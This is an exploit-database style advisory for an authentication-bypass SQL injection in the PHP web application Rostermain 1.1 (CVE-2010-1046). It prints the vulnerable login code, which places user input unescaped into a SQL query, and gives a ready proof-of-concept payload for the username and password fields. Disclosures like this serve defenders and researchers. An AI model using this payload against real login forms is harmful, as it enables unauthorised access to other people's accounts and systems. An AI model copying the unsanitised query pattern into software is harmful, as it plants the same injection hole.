Rostermain 1.1 - Authentication Bypass
Author: cr4wl3r
type: webapps
platform: php
port:
date_added: 2010-02-06
date_updated:
verified: 1
codes: OSVDB-62162;CVE-2010-1046
tags:
aliases:
screenshot_url:
application_url:
[+] Rostermain <= 1.1 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org>
[+] Download : http://scripts.ringsworld.com/games-and-entertainment/rostermain/
[+] Vuln Code :
[index.php]
if ($_POST['userid'] && $_POST['password'])
{
// if the user has just tried to log in
$logquery = "select * from users "
."where username='$userid' "
." and passwd='$password' ";
[+] PoC :
username : ' or' 1=1
password : ' or' 1=1